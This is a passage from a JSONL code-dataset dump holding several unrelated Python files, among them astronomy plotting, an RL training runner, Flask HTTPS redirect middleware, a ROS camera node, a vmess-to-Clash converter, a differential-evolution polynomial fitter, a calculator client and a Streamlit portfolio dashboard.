yrange=[_RCYMIN-2.25,_RCYMAX+2.25],\n contours=False,\n vmin=vmin,vmax=vmax,overplot=True,zorder=3)\n if True:\n #Now plot the pixels outside the APOGEE data set\n plotthis= copy.copy(expec_vlos)\n plotthis[True-numpy.isnan(resv)]= numpy.nan #turn these off\n bovy_plot.bovy_dens2d(plotthis.T,origin='lower',cmap='jet',\n interpolation='nearest',\n alpha=0.3,\n xrange=[_RCXMIN-2.25,_RCXMAX+2.25],\n yrange=[_RCYMIN-2.25,_RCYMAX+2.25],\n contours=False,\n vmin=vmin,vmax=vmax,overplot=True,\n zorder=0)\n pyplot.annotate(r'$\\mathrm{Bovy\\ et.\\ al\\ (2012)\\ model}$',\n (1.02,1.09),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',size=10.,zorder=3)\n pyplot.axis([_RCXMIN-2.25,_RCXMAX+2.25,_RCYMIN-2.25,_RCYMAX+2.25])\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(xlabel,r'$ $')\n #Finally, add a polar plot of the whole disk\n res= 51\n rmin, rmax= 0.2, 2.4\n xgrid= numpy.linspace(0.,2.*numpy.pi*(1.-1./res/2.),\n 2.*res)\n ygrid= numpy.linspace(rmin,rmax,res)\n nx= len(xgrid)\n ny= len(ygrid)\n savefile= 'expec_vlos.sav'\n if os.path.exists(savefile):\n savefile= open(savefile,'rb')\n expec_vlos= pickle.load(savefile)\n savefile.close()\n else:\n expec_vlos= numpy.zeros((nx,ny))\n for ii in range(nx):\n for jj in range(ny):\n R, phi= ygrid[jj], xgrid[ii]\n d,l= bovy_coords.rphi_to_dl_2d(R,phi)\n expec_vlos[ii,jj]= modelvlosgal(R*8.,phi,l,\n vc=218.,vtsun=242.)\n save_pickles(savefile,expec_vlos)\n plotxgrid= numpy.linspace(xgrid[0]-(xgrid[1]-xgrid[0])/2.,\n xgrid[-1]+(xgrid[1]-xgrid[0])/2.,\n len(xgrid)+1)\n plotygrid= numpy.linspace(ygrid[0]-(ygrid[1]-ygrid[0])/2.,\n ygrid[-1]+(ygrid[1]-ygrid[0])/2.,\n len(ygrid)+1)\n fullmodelAxes= pyplot.axes([-0.05+2.*axdx,(1.-tdy)/2.,axdx,tdy],polar=True)\n ax= fullmodelAxes\n pyplot.sca(fullmodelAxes)\n vmin, vmax= -150., 150.\n zlabel= r'$\\mathrm{line\\!-\\!of\\!-\\!sight\\ velocity}\\ (\\mathrm{km\\,s}^{-1})$'\n out= ax.pcolor(plotxgrid,plotygrid,expec_vlos.T,cmap='jet',\n vmin=vmin,vmax=vmax,clip_on=False)\n shrink= 0.8\n if False:\n CB1= pyplot.colorbar(out,shrink=shrink)\n bbox = CB1.ax.get_position().get_points()\n CB1.ax.set_position(transforms.Bbox.from_extents(bbox[0,0]+0.025,\n bbox[0,1],\n bbox[1,0],\n bbox[1,1]))\n CB1.set_label(zlabel)\n from matplotlib.patches import FancyArrowPatch\n arr= FancyArrowPatch(posA=(numpy.pi+0.1,1.8),\n posB=(3*numpy.pi/2.+0.1,1.8),\n arrowstyle='->', \n connectionstyle='arc3,rad=%4.2f' % (numpy.pi/8.-0.05),\n shrinkA=2.0, shrinkB=2.0, mutation_scale=20.0, \n mutation_aspect=None,fc='k')\n ax.add_patch(arr)\n bovy_plot.bovy_text(numpy.pi+0.17,1.7,r'$\\mathrm{Galactic\\ rotation}$',\n rotation=-30.,size=9.)\n radii= numpy.array([0.5,1.,1.5,2.,2.5])\n labels= []\n for r in radii:\n ax.plot(numpy.linspace(0.,2.*numpy.pi,501,),\n numpy.zeros(501)+r,ls='-',color='0.65',zorder=1,lw=0.5)\n labels.append(r'$%i$' % int(r*8.))\n pyplot.rgrids(radii,labels=labels,angle=147.5)\n thetaticks = numpy.arange(0,360,45)\n # set ticklabels location at x times the axes' radius\n ax.set_thetagrids(thetaticks,frac=1.16,backgroundcolor='w',zorder=3)\n bovy_plot.bovy_text(3.*numpy.pi/4.+0.06,2.095,r'$\\mathrm{kpc}$',size=10.)\n pyplot.ylim(0.,2.8)\n #Plot the box\n xs= numpy.linspace(_RCXMIN-2.25,_RCXMAX+2.25,101)\n ys= numpy.ones(101)*(_RCYMIN-2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the box\n xs= numpy.linspace(_RCXMIN-2.25,_RCXMAX+2.25,101)\n ys= numpy.ones(101)*(_RCYMAX+2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the box\n ys= numpy.linspace(_RCYMIN-2.25,_RCYMAX+2.25,101)\n xs= numpy.ones(101)*(_RCXMIN-2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the box\n ys= numpy.linspace(_RCYMIN-2.25,_RCYMAX+2.25,101)\n xs= numpy.ones(101)*(_RCXMAX+2.25)\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n ax.plot(phis,rs,'--',lw=1.25,color='k')\n #Plot the connectors on the modelAxes\n xlow=-4.*8.\n ylow= 2.77*8.\n xs= numpy.linspace(xlow,(_RCXMAX+2.25),101)\n ys= (ylow-(_RCYMAX+2.25))/(xlow-(_RCXMAX+2.25))*(xs-xlow)+ylow\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n line= ax.plot(phis,rs,':',lw=1.,color='k',zorder=2)\n line[0].set_clip_on(False)\n xlow=-4.*8.\n ylow= -2.77*8.\n xs= numpy.linspace(xlow,(_RCXMAX+2.25),101)\n ys= (ylow-(_RCYMIN-2.25))/(xlow-(_RCXMAX+2.25))*(xs-xlow)+ylow\n rs= numpy.sqrt(xs**2.+ys**2.)/8.\n phis= numpy.arctan2(ys,xs) \n line= ax.plot(phis,rs,':',lw=1.,color='k',zorder=2)\n line[0].set_clip_on(False)\n #Colorbar\n cbaxes = pyplot.axes([0.01+2.*axdx,(1.-tdy)/2.+tdy+0.065,axdx-0.125,0.02])\n CB1= pyplot.colorbar(out,orientation='horizontal',\n cax=cbaxes,ticks=[-150.,-75.,0.,75.,150.])\n #CB1.set_label(r'$\\mathrm{median}\\ V_{\\mathrm{los}}\\,(\\mathrm{km\\,s}^{-1})$',labelpad=-35,fontsize=14.)\n bovy_plot.bovy_end_print(plotfilename,dpi=300)\n return None\n\nif __name__ == '__main__':\n if len(sys.argv) > 2:\n plot_rckinematics(sys.argv[1],subsun=True)\n else:\n plot_rckinematics(sys.argv[1],subsun=False)\n","sub_path":"py/plot_rckinematics.py","file_name":"plot_rckinematics.py","file_ext":"py","file_size_in_byte":10322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42321147","text":"import os\nimport subprocess\nimport datetime\nimport time\n\nseeds = [64,42,96,33,11]\n\ntime_start = datetime.datetime.now()\n\nfor seed in seeds:\n\tcommand = \"python train.py --algo ppo2 --env HalfCheetahBulletEnv-v0 -n 2000000 --tensorboard-log /tmp/stable-baselines/ --verbose 0 --seed \" + str(seed)\n\tsubprocess.call(command, shell=True)\n\tprint(\"Finished training run with seed {}\".format(seed))\n\ntime_end = datetime.datetime.now()\ntime_spent = time_end - time_start\ntime_spent_mins = time_spent.seconds / 60\n\nprint(\"Finished training\")\nprint(\"Training took {} minutes\".format(time_spent_mins))\n","sub_path":"experiment_ppo2_halfcheetah.py","file_name":"experiment_ppo2_halfcheetah.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"404532370","text":"from flask import current_app, request, redirect\n\nSKIP_SSL_CHECK = set()\n\ndef _should_redirect():\n \"\"\"Helper to determine if this request should be redirected or not\"\"\"\n #! Do not redirect if we *are* in debug or testing modes\n criteria = [\n request.is_secure,\n current_app.debug,\n current_app.testing,\n request.headers.get('X-Forwarded-Proto', 'http') == 'https'\n ]\n\n return not any(criteria) and request.url.startswith('http://')\n\n\ndef redirect_to_ssl():\n \"\"\"Before request helper to ensure we are using HTTPS\"\"\"\n if request.endpoint in SKIP_SSL_CHECK:\n return\n\n if _should_redirect():\n url = request.url.replace('http://', 'https://', 1)\n return redirect(url, code=301)\n\n\ndef allow_http(func):\n \"\"\"Helper to mark an endpoint as not needing https redirection\"\"\"\n SKIP_SSL_CHECK.add(func.__name__)\n return func","sub_path":"ud/middleware/ssl.py","file_name":"ssl.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"68987902","text":"#!/usr/bin/env python\nimport rospy\nfrom rslite import rsconfig\nfrom rslite import rslite\nfrom std_msgs.msg import String, Header\nfrom sensor_msgs.msg import Image, PointCloud2, PointField\nimport sensor_msgs.point_cloud2 as pc2\nimport time\nimport math\nimport numpy as np\nfrom cv_bridge import CvBridge\nimport pyrealsense2 as rs\n\nimport tf\nimport tf2_ros\nimport geometry_msgs.msg\nimport pcl_msgs\nimport pcl_ros\n\n\ndef imagePub(pc = False):\n #Initialise RS Camera\n config = rsconfig.depth_480_fps_90() #Must have colour stream\n cam = rslite.RSCam(config, True)\n cam.startStreaming()\n \n #Initialise ROS Publishers\n pubDepth = rospy.Publisher('RSL/Image/Depth', Image, queue_size=10)\n pubColor = rospy.Publisher('RSL/Image/Color', Image, queue_size=10)\n if pc:\n pubPC = rospy.Publisher('RSL/Pointcloud', PointCloud2, queue_size=10)\n rospy.init_node('RSLCamera', anonymous=True)\n publishBasicTransform('rs_frame')\n rate = rospy.Rate(120) # 120Hz\n while not rospy.is_shutdown():\n frameDepth = cam.pollDisparityFrame()\n if frameDepth:\n depthImage = generateImageFromFrame(frameDepth)\n pubDepth.publish(depthImage)\n frameColor = cam.pollColorFrame()\n frameColor = False #TODO REMOVE####################\n if frameColor:\n colorImage = generateImageFromFrame(frameColor)\n pubColor.publish(colorImage)\n framePC = cam.pollPointCloud()\n if pc and framePC:\n pointcloud = generatePointcloud(framePC)\n pubPC.publish(pointcloud)\n rate.sleep()\n cam.stopStreaming()\n\ndef generatePointcloud(frame):\n frame = rs.points(frame)\n pc = PointCloud2()\n pc.header.seq = frame.frame_number\n pc.header.stamp.secs = math.floor(frame.get_timestamp()/1000)\n pc.header.stamp.nsecs = int((frame.get_timestamp()%1000)*10**6)\n pc.header.frame_id = \"rs_frame\" #TODO Sort this shit out\n pc.height = 1 #As is unordered TODO check this\n pc.width = frame.size()\n pc.fields = genPointField()\n pc.is_bigendian = False #TODO Check\n pc.data = np.asanyarray(frame.get_vertices()).tobytes()\n pc.is_dense = True\n pc.point_step = 12\n pc.row_step = pc.point_step*pc.width\n return pc\n\n\ndef genPointField():\n #Does not support RGB\n x = PointField()\n x.name = \"x\"\n x.offset = 0\n x.datatype = 7\n x.count = 1\n y = PointField()\n y.name = \"y\"\n y.offset = 4\n y.datatype = 7\n y.count = 1\n z = PointField()\n z.name = \"z\"\n z.offset = 8\n z.datatype = 7\n z.count = 1\n # rgb = PointField()\n # rgb.name = \"rgb\"\n # rgb.offset = 12\n # rgb.\n return [x,y,z]\n \n \ndef publishBasicTransform(name):#TODO this should not be static and should have correct rotation\n broadcaster = tf2_ros.StaticTransformBroadcaster()\n static_transformStamped = geometry_msgs.msg.TransformStamped()\n\n static_transformStamped.header.stamp = rospy.Time.now()\n static_transformStamped.header.frame_id = \"world\"\n static_transformStamped.child_frame_id = name\n\n static_transformStamped.transform.translation.x = float(0)\n static_transformStamped.transform.translation.y = float(0)\n static_transformStamped.transform.translation.z = float(0)\n\n quat = tf.transformations.quaternion_from_euler(\n float(math.pi/2),float(math.pi),float(-math.pi/2))\n static_transformStamped.transform.rotation.x = quat[0]\n static_transformStamped.transform.rotation.y = quat[1]\n static_transformStamped.transform.rotation.z = quat[2]\n static_transformStamped.transform.rotation.w = quat[3]\n\n broadcaster.sendTransform(static_transformStamped)\n\ndef generateImageFromFrame(frame):\n frame = rs.video_frame(frame)\n img = Image()\n img.header.seq = frame.frame_number\n img.header.stamp.secs = math.floor(frame.get_timestamp()/1000)\n img.header.stamp.nsecs = int((frame.get_timestamp()%1000)*10**6)\n img.header.frame_id = \"rs_frame\" #TODO Sort this shit out\n img.height = frame.get_height()\n img.width = frame.get_width()\n img.encoding = getROSImageFormatFromRS(frame.get_profile().format())\n img.is_bigendian = False\n img.step = frame.get_stride_in_bytes()\n bridge = CvBridge()\n data = np.asanyarray(frame.get_data())\n img.data = bridge.cv2_to_imgmsg(data, encoding='passthrough').data\n return img\n\ndef getROSImageFormatFromRS(rsformat):\n if(rsformat == rs.format.bgr8):\n return \"bgr8\"\n elif(rsformat == rs.format.z16):\n return \"mono16\"\n else:\n print(\"Error: Unknown or unsupported image format\")\n print(rsformat)\n raise RuntimeError\n\n\nif __name__ == '__main__':\n try:\n imagePub(True)\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/rslite_node.py","file_name":"rslite_node.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"495696081","text":"# -*- coding: utf-8 -*-\r\n\r\nimport requests\r\nimport base64\r\nimport json\r\nimport yaml\r\n\r\n\r\ndef get_vmess(url):\r\n \"\"\"\r\n 获取vmess订阅\r\n :param url:\r\n :return:\r\n \"\"\"\r\n r = requests.get(url)\r\n vmess_content = r.text\r\n if not vmess_content.endswith(\"==\"):\r\n vmess_content += \"==\"\r\n\r\n vmess_list = base64.b64decode(vmess_content).decode().split(\"vmess://\")\r\n vmess_list = map(lambda x: base64.b64decode(x + \"==\").decode(), vmess_list)\r\n vmess_list = filter(len, vmess_list)\r\n vmess_list = map(json.loads, vmess_list)\r\n vmess_list = map(vmess_sub_to_clash, vmess_list)\r\n return remove_vmess_node(vmess_list, \"特殊\")\r\n\r\n\r\ndef vmess_sub_to_clash(d):\r\n \"\"\"\r\n 将vmess订阅结果转换成clash的proxy格式\r\n :param d:\r\n :return:\r\n \"\"\"\r\n new_d = {\r\n \"name\": d[\"ps\"],\r\n \"type\": \"vmess\",\r\n \"server\": d[\"add\"],\r\n \"port\": d[\"port\"],\r\n \"uuid\": d[\"id\"],\r\n \"alterId\": 2,\r\n \"cipher\": \"auto\",\r\n \"tls\": True\r\n }\r\n return new_d\r\n\r\n\r\ndef remove_vmess_node(vmess_list, keyword):\r\n \"\"\"\r\n 将指定的关键字节点从节点列表中移除\r\n :param vmess_list:\r\n :param keyword:\r\n :return:\r\n \"\"\"\r\n new_vmess_list = []\r\n for n in vmess_list:\r\n if keyword in n[\"name\"]:\r\n continue\r\n new_vmess_list.append(n)\r\n return new_vmess_list\r\n\r\n\r\ndef generate_proxy_groups(proxy_groups: list, proxies: list) -> list:\r\n \"\"\"\r\n - 🇭🇰 香港节点\r\n - 🇨🇳 台湾节点\r\n - 🇸🇬 新加坡节点\r\n - 🇯🇵 日本节点\r\n - 🇺🇲 美国节点\r\n - 🚀 手动切换\r\n :param proxy_groups:\r\n :param proxies:\r\n :return:\r\n \"\"\"\r\n um = []\r\n jp = []\r\n sg = []\r\n cn = []\r\n hk = []\r\n for n in proxies:\r\n if \"美国\" in n[\"name\"]:\r\n um.append(n[\"name\"])\r\n elif \"日本\" in n[\"name\"]:\r\n jp.append(n[\"name\"])\r\n elif \"新加坡\" in n[\"name\"]:\r\n sg.append(n[\"name\"])\r\n elif \"台湾\" in n[\"name\"]:\r\n cn.append(n[\"name\"])\r\n elif \"港\" in n[\"name\"]:\r\n hk.append(n[\"name\"])\r\n\r\n for idx, value in enumerate(proxy_groups):\r\n if value[\"name\"] == \"🇭🇰 香港节点\":\r\n proxy_groups[idx][\"proxies\"] = hk\r\n if value[\"name\"] == \"🇨🇳 台湾节点\":\r\n proxy_groups[idx][\"proxies\"] = cn\r\n if value[\"name\"] == \"🇸🇬 新加坡节点\":\r\n proxy_groups[idx][\"proxies\"] = sg\r\n if value[\"name\"] == \"🇯🇵 日本��点\":\r\n proxy_groups[idx][\"proxies\"] = jp\r\n if value[\"name\"] == \"🇺🇲 美国节点\":\r\n proxy_groups[idx][\"proxies\"] = um\r\n if value[\"name\"] == \"🚀 手动切换\":\r\n proxy_groups[idx][\"proxies\"] = [n[\"name\"] for n in proxies]\r\n\r\n return proxy_groups\r\n\r\n\r\ndef get_rule():\r\n \"\"\"\r\n get remote rule, and set it to global variable\r\n :return:\r\n \"\"\"\r\n global config\r\n with open(\"config/clash-my-rule.yml\") as f:\r\n my_rule = yaml.safe_load(f)\r\n r = requests.get(config.rule_url)\r\n rule = yaml.safe_load(r.text)\r\n rule = my_rule + rule\r\n\r\n return rule\r\n\r\n\r\ndef get_clash_sub(vmess_url):\r\n \"\"\"\r\n :param vmess_url:\r\n :return:\r\n \"\"\"\r\n # 解析订阅成proxy group(排除掉一些自己不喜欢的节点)\r\n proxies = get_vmess(vmess_url)\r\n with open(\"config/clash-proxy-group.yml\", encoding='UTF-8') as f:\r\n proxy_groups = yaml.safe_load(f)\r\n proxy_groups = generate_proxy_groups(proxy_groups, proxies)\r\n\r\n # 读取lhie1规则,加上自己的规则\r\n rule = get_rule()\r\n\r\n with open(\"config/clash-config-template.yml\", encoding=\"utf-8\") as f:\r\n template = yaml.safe_load(f)\r\n\r\n # 接口返回完整的clash文件\r\n template[\"Proxy\"] = proxies\r\n template[\"Proxy Group\"] = proxy_groups\r\n template[\"Rule\"] = rule\r\n\r\n return yaml.dump(template, sort_keys=False)\r\n\r\n\r\nclass Config:\r\n def __init__(self, rule_url):\r\n self.rule_url = rule_url\r\n\r\n\r\nconfig = Config(rule_url=\"https://raw.githubusercontent.com/lhie1/Rules/master/Clash/Rule.yaml\")\r\n\r\nif __name__ == '__main__':\r\n # 将vmess订阅链接当作参数传递进来\r\n vmess_url = \"\"\r\n get_clash_sub(vmess_url)\r\n","sub_path":"vmess2clash.py","file_name":"vmess2clash.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"499102605","text":"import math\n\n\nclass Data:\n \"\"\" Class to store input data for the equation being solved\n\n Args:\n t: time resolution (time step); default to 0.0001 * pi\n n: number of sample points in the domain; default to 1024 * 8\n e: evaluation time (time step stop condition); default to 0.1 * pi\n p: power that corresponds to u|u|^p\n \"\"\"\n def __init__(self, t, n, e, p):\n if t is None:\n self.time_resolution = 0.0001 * math.pi\n else:\n self.time_resolution = t\n\n if n is None:\n self.samples = 1024 * 8\n else:\n self.samples = n\n\n if e is None:\n self.evaluation_time = 0.1 * math.pi\n else:\n self.evaluation_time = e\n\n if p is None:\n self.power = 2\n else:\n self.power = p\n\n\n\n","sub_path":"finalProject/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"47878396","text":"s=input(\"\")\ns1=s.lower()\nl=[]\nl1=[]\nfor i in s1:\n if 96|()-=]',\n '', submission[\"title\"][:25]) +\n \".jpg\")\n with open(file_path, 'wb') as fo:\n for chunk in response.iter_content(4096):\n fo.write(chunk)\n fo.close()\n self.succeeded += 1\n else:\n self.failed += 1\n self.failed_list.append(submission)\n download_n += 1\n\n def print_stats(self):\n print(\"\\n\")\n self.skipped = len(self.skipped_list)\n print('Posts downloaded: {}/{} \\nSkipped: {}\\nFailed: {}'\n .format(self.succeeded, self.total_posts, self.skipped, self.failed))\n\n def save_posts(self):\n for post in self.posts:\n self.db.insert_link(post)\n self.db.save_changes()\n\n def run(self):\n print('Fetching URLS...')\n self.get_posts(self.r.get_subreddit(self.args.subreddit))\n self.download_images()\n self.save_posts()\n self.print_stats()\n\n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"587384648","text":"import requests\nimport urllib\n\n\ndef calc(expr):\n service_url = 'http://api.mathjs.org/v4/'\n expr_encoded = urllib.parse.quote(expr)\n url = service_url + '?expr=' + expr_encoded\n response = requests.get(url)\n result = ''\n if response.status_code == 200:\n result = f'Result: {response.text}'\n else:\n result = 'Error happened. Try using a valid expression'\n return result\n\n\nif __name__ == '__main__':\n msg = '3*sqrt(4)+5^2*2'\n result = calc(msg)\n print(result)\n","sub_path":"services/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"599956754","text":"import random\nimport sys\nprint(sys.version)\nimport pandas as pd\n#import math\nimport numpy as np\n\nclass GenomDifEvolModel:\n def __init__(self, n, iterations_count, population_size, F, C):\n self.coefficients = None\n self.n = n\n self.iterations_count = iterations_count\n self.population_size = population_size\n self.F = F\n self.C = C\n\n def __str__(self):\n if not self.coefficients:\n return \"Model is empty\"\n c = self.coefficients\n s = str(c[0])\n for i in range(1, len(c)):\n last = \" - \" + s[1:] if s.startswith(\"-\") else \" + \" + s\n s = str(c[i]) + \"*x^\" + str(i) + last\n return s\n\n def fit(self, x, y):\n population = self.generate_random_population()\n best_error = sys.maxsize\n best_model = None\n for i in range(self.iterations_count):\n print(\"Iteration: \", i, best_error, best_model)\n for j in range(len(population)):\n x_pop = population[j]\n a, b, c = self.generate_random_a_b_c(population, j)\n k = random.randint(0, self.n)\n new_x = list(x_pop)\n for yi in range(len(x_pop)):\n r = random.randint(0, 100)/100.\n if yi == k or r < self.C:\n new_x[yi] = a[yi] + self.F * (b[yi] - c[yi])\n x_value = [self.getval(xpoint, x_pop) for xpoint in x]\n x_error = compare(x_value, y)\n x_new_value = [self.getval(xpoint, new_x) for xpoint in x]\n x_new_error = compare(x_new_value, y)\n if best_error > x_error:\n best_model = x_pop\n best_error = x_error\n if x_error > x_new_error:\n population[j] = new_x\n if best_error > x_new_error:\n best_model = new_x\n best_error = x_new_error\n\n self.coefficients = best_model\n\n def predict(self, x):\n return [self.getval(i, self.coefficients) for i in x]\n\n def generate_random_population(self):\n return [self.generate_random_coefficients() for i in range(self.population_size)]\n\n def generate_random_coefficients(self):\n return [random.randint(-1000, 1000)/1000. for i in range(self.n + 1)]\n\n def generate_random_a_b_c(self, population, xi):\n result = []\n exist = [xi]\n for i in range(3):\n j = random.randint(0, len(population) - 1)\n while j in exist:\n j = random.randint(0, len(population) - 1)\n exist.append(j)\n result.append(population[j])\n return result\n\n\n def getval(self, xpoint, coefficients):\n s = 0.0\n for i in range(self.n, 0, -1):\n s = (s + coefficients[i]) * xpoint\n return s + coefficients[0]\n\ndef compare(predict, real):\n diff = (predict - real)\n diff = diff*diff\n diff = np.sqrt(diff.sum()/len(diff))\n return diff\n\ndef cross_validation(index, k = 2, shuffle = True, seed = 1):\n rand = np.random.RandomState(seed)\n ind = rand.choice(index, size = len(index),replace = False) if shuffle else index\n for i in range(0,k):\n training = [x for j,x in enumerate(ind) if j % k != i]\n validation = [x for j,x in enumerate(ind) if j % k == i]\n yield training, validation\n\ndef cv_model(model, dataset, value, response, cv_folds):\n results_learn = []\n results_valid = []\n for i in range(cv_folds):\n for train_index, valid_index in cross_validation(dataset.index, seed = i):\n #print(train_index, valid_index)\n try:\n train_set = dataset.ix[train_index]\n valid_set = dataset.ix[valid_index]\n model.fit(np.array(train_set.drop(response, axis=1)[value]),\n np.array(train_set[response]))\n predict_learn = model.predict(np.array(train_set[value]))\n predict_valid = model.predict(np.array(valid_set[value]))\n results_learn.append(compare(predict_learn, np.array(train_set[response])))\n results_valid.append(compare(predict_valid, np.array(valid_set[response])))\n except np.linalg.LinAlgError:\n pass\n #print(\"Warn LinAlgError\")\n results = (np.mean(results_learn), np.std(results_learn), np.mean(results_valid), np.std(results_valid))\n print(results)\n return results\n\ndef tune_model(dataset, value, response, cv_folds, max_n):\n results = []\n for i in range(4, max_n + 1):\n print(\"CV on \" + str(i) + \" degree model\")\n results.append(cv_model(GenomDifEvolModel(i, iterations_count, population_size, F, C),\n dataset, value, response, cv_folds))\n return pd.DataFrame(results, index=range(4, max_n + 1), columns=[\"mean_learn\", \"std_learn\", \"mean_valid\", \"std_valid\"])\n\ndataset_learn_name = \"learn.txt\"\ndataset_test_name = \"test.txt\"\ncv_folds = 5\nmax_n = 20\niterations_count = 100\npopulation_size = 100\nF = 1.5\nC = 0.1\n\nprint(\"Training model. dataset:\" + dataset_learn_name + \", folds: \" + str(cv_folds) + \", max n: \" + str(max_n))\ndataset_learn = pd.read_csv(dataset_learn_name, header=None, sep=\"\\t\")\ncolumns = dataset_learn.columns\ntune_results = tune_model(dataset_learn, columns[0], columns[1], cv_folds, max_n)\n#print(tune_results)\n#print(tune_results[\"mean_valid\"].idxmin())\n\nbest_result_n = tune_results[\"mean_valid\"].idxmin()\nbest_model = GenomDifEvolModel(best_result_n, iterations_count, population_size, F, C)\nbest_model.fit(np.array(dataset_learn[columns[0]]), np.array(dataset_learn[columns[1]]))\nprint(\"Best model: \" + str(best_result_n) + \" degree. \" + str(best_model) + \"\\n\")\nprint(\"Errors: \")\nprint(tune_results.ix[best_result_n])\n\ndataset_test = pd.read_csv(dataset_test_name, header=None, sep=\"\\t\")\ncolumns = dataset_test.columns\npredict = best_model.predict(np.array(dataset_test[columns[0]]))\nerror_on_test = compare(predict, np.array(dataset_test[columns[1]]))\nprint(\"\\nError on test: \" + str(error_on_test))\n\n#PolinomModel(i)\n#print(dataset.shape[0])","sub_path":"5/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174384288","text":"import time\r\nimport requests\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pkg_resources\r\nimport yfinance as yf\r\nimport datetime as dt\r\nimport plotly.express as px\r\nimport matplotlib.pyplot as plt\r\nimport streamlit as st\r\n\r\nimport statsmodels.api as sm\r\nfrom statsmodels import regression\r\n\r\nfrom dash_tools import DashTools\r\n\r\ndef diagnostics():\r\n\r\n #make a list of the required packages\r\n required = {'numpy', 'pandas', 'yfinance', 'streamlit', 'plotly', 'statsmodels', 'matplotlib'}\r\n \r\n #then make a list of the installed packages\r\n installed = {pkg.key for pkg in pkg_resources.working_set}\r\n \r\n #then get the packages that are not installed\r\n missing = required - installed\r\n \r\n #if the missing packages is greater than 0 meaning there is a package not installed\r\n if len(missing) > 0:\r\n \r\n #output that there was a problem\r\n st.write(\"there was a problem\")\r\n \r\n #then loop through the missing packages\r\n for i in missing:\r\n \r\n #output the name of the package\r\n st.subheader(\"Packages: could not find {} package try pip installing it\".format(i))\r\n \r\n #the scenario when all of the packages are installed\r\n else:\r\n \r\n #output that they have ben installed\r\n st.subheader(\"Packages: all packages installed\")\r\n \r\n url = \"http://colorado.edu?\"\r\n timeout = 5\r\n \r\n #we want to tset internet connection\r\n try:\r\n \r\n #we want to get a request page\r\n request = requests.get(url, timeout=timeout)\r\n \r\n #we want to output\r\n st.subheader(\"Internet: Connected to the internet\")\r\n \r\n #when we don't have an internet connection\r\n except (requests.ConnectionError, requests.Timeout) as exception:\r\n \r\n #then output that out\r\n st.subheader(\"No internet Connection\")\r\n \r\n try:\r\n \r\n df = pd.read_excel(\"holdings.xls\", index_col = 0)\r\n\r\n if len(df.columns) > 1:\r\n st.subheader(\"expected only 2 columns in excel file but received more\")\r\n \r\n if df.columns[0] != \"share_count\":\r\n st.subheader(\"expected 2nd coumn to be named share_count\")\r\n \r\n try:\r\n \r\n tickers = df.index.to_list()\r\n yf.download(tickers)\r\n st.subheader(\"tickers checked out\")\r\n \r\n except:\r\n st.subheader(\"possibly incorrect ticker\")\r\n \r\n try:\r\n share_count = df['share_count']\r\n \r\n for i in share_count:\r\n if i < 1:\r\n st.subheader(\"problem with share value being 0 or negative or inputted incorrectly\")\r\n \r\n except:\r\n st.subheader(\"Excel file seems fine can't find problem\")\r\n \r\n except:\r\n st.subheader(\"Couldn't find file, please read documentation for excel file\")\r\n \r\n try:\r\n \r\n #we want to test to see if it is an xlsx file\r\n test = pd.read_csv(\"holdings.xls\")\r\n st.subheader(\"file is an xls, due to the file output from the brokerage service we can only accept xls\")\r\n \r\n except:\r\n st.subheader(\"tried finding xls please read documentation for excel file\")\r\n \r\nst.set_page_config(layout=\"wide\")\r\n\r\n#this makes the portfolio pie diversification\r\ndef portfolio_pie(dashtools):\r\n \r\n #import the daily portfolio which keeps track of each value of the stock and the portfolio value\r\n daily_portfolio = dashtools.daily_portfolio\r\n \r\n #get the value of the portfolio into a list\r\n final_val = daily_portfolio['value'][len(daily_portfolio) - 1]\r\n \r\n #this is going to make our output dataframe\r\n pie = dashtools.weights.reset_index().drop(columns = [\"share_count\"])\r\n \r\n #then this is going to rename the column\r\n pie.columns = [\"ticker\"]\r\n \r\n #sort alphabetically\r\n pie['ticker'] = sorted(pie['ticker'])\r\n \r\n #then initialize a new column to be empty for the percetnage value\r\n pie['weight'] = \"\"\r\n \r\n #now we want to go through all of the columns except for the last one which is portfoli ovalue\r\n for counter, i in enumerate(daily_portfolio.columns[:-1]):\r\n \r\n #the [i][len(daily_portfolio) - 1] will get the last value of the stock in the fund then divide by the final value\r\n weight = daily_portfolio[i][len(daily_portfolio) - 1] / final_val\r\n \r\n #add that weight to the dataframe\r\n pie['weight'][counter] = round(weight, 4)\r\n \r\n #in this case we want to make the plotly object\r\n diversification_pie = px.pie(dashtools.weights, values = pie['weight'], names = pie['ticker'])\r\n \r\n st.subheader(\"Portfolio 